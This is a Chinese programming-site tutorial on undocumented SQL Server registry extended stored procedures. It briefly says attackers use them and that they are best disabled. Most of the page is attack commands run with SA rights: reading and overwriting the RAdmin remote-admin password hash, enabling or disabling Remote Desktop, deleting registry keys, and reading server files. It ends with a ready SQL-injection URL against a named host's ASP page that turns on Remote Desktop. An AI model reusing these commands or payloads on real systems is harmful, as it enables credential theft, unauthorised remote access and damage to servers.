程序師世界是廣大編程愛好者互助、分享、學習的平台,程序師世界有你更精彩!
設為首頁 加入收藏
首頁
編程語言
C語言|JAVA編程
Python編程
網頁編程
ASP編程|PHP編程
JSP編程
數據庫知識
MYSQL數據庫|SqlServer數據庫
Oracle數據庫|DB2數據庫
 程式師世界 >> 數據庫知識 >> 其他數據庫知識 >> 更多數據庫知識 >> 幾個擴展存儲過程使用方法

幾個擴展存儲過程使用方法

編輯:更多數據庫知識

SQL Server中包含了幾個可以訪問系統注冊表的擴展存儲過程.但實際上這幾個擴展存儲過程是未公開的,從sql server 7.0就有了,
在SQL server 2000中仍然保留,他們以後可能會刪除.但是這幾個存儲過程卻提供了在當前的SQL Server版本中訪問系統注冊表的能力,
而且很多人利用SQL Server來進行攻擊系統時,往往都會用到這幾個擴展存儲過程.所以最好在SQL Server中禁用他們.
xp_regenumvalues 以多個記錄集方式返回所有鍵值
使用方法:
xp_regenumvalues 注冊表根鍵, 子鍵
比如說,想看看HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 的所有鍵值:

use master
exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters'

xp_regread 返回制定鍵的值
使用方法:
xp_regread 根鍵,子鍵,鍵值名
use master
exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir'
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter'
得到密碼
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections'
遠程桌面開啟為0
xp_regwrite 寫入注冊表
使用方法:
xp_regwrite 根鍵,子鍵, 值名, 值類型, 值
use master
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello'
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0xD7B7CB315B4E731D8E9EF886CE6DCB23

exec xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0xD7B7CB315B4E731D8E9EF886CE6DCB23;--

exec xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY','';--
必須清空後再寫新數值
修改成功的前提是值為空
注意值類型有2種REG_SZ 表示字符型,相當於新建字符串值,REG_DWORD 表示整型,相當於新建DWORD值
REG_BINARY
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWord',1;--
禁用遠程桌面
xp_regdeletevalue 刪除某個值
使用方法:
xp_regdeletevalue 根鍵,子鍵,值名
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName'
use master
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter'

xp_regdeletekey 刪除鍵,包括該鍵下所有值
使用方法:
use master
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey'
exec xp_regdeletekey 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters'

運行前提SA
可能用處不是很大,也沒深入研究,因為覺得讀asp用xp_makecab更方便點,僅供思維擴展。
方法1.bulk insert aaa FROM 'c:\1.txt'
方法2.xp_readerrorlog 1,'c:\1.txt'
開啟遠程桌面http://192.168.200.188/product_list.asp?classid=14;exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWord',0;--

  1. 上一頁:
  2. 下一頁:
更多數據庫知識
sqlserver數據庫大型應用解決方案經驗總結

隨著互聯網應用的廣泛普及,海量數據的存儲和訪問成為了系統
SQL Server 2000 清理日志精品圖文教程

SQL Server 2000 清理日志精品教程 SQL

SQL Server查看未釋放游標的方法,sqlserver釋放游標

SQL Server查看未釋放游標的方法,sqlserver
CASE表達式實現基於條件邏輯來返回一個值,case表達式

CASE表達式實現基於條件邏輯來返回一個值,case表達式

SQL Server誤區30日談 第26天 SQL Server中存在真正的“事務嵌套”

誤區 #26: SQL Server中存在真正的“事務嵌套
在Windows XP系統安裝SQL server 2000 企業版(圖解版),系統安裝sql

在Windows XP系統安裝SQL server 2000
相關文章
閱讀排行榜
SQL計算字符串中最大的遞增子序列的方法,sql字符串 SQL語句查詢數據庫中重復記錄的個數 sql server 2000 數據庫自動備份設置方法,sqlserver SQLSERVER的非聚集索引結構深度理解 用mysqldump導出Trigger問題解決方法 解析SQL Server 2008的商業智能 Sql Server 2016新功能之Row-Level Security(值得關注),2016row-level SQL Server數據庫的轉儲設備 SQL Server代理服務無法啟動怎麼辦,sqlserver sql語句返回主鍵SCOPE_IDENTITY() 創建和配置ODBC數據源(SQL入門)
熱門圖文
SQL Server中TRUNCATE事務回滾操作方法,servertruncate gem install mysql報錯checking for mysql_qu MySQL數據庫復位根用戶的密碼 Redis教程(十一):虛擬內存介紹 一個實例講解MySQL查詢優化 正確使用MySQL update語句 MySQL數據類型之數字類型詳細解析 Keepalived+HAProxy實現MySQL高可用負載均衡的配置
欄目導航
PostgreSQL更多數據庫知識PL/SQL
Copyright © 程式師世界 All Rights Reserved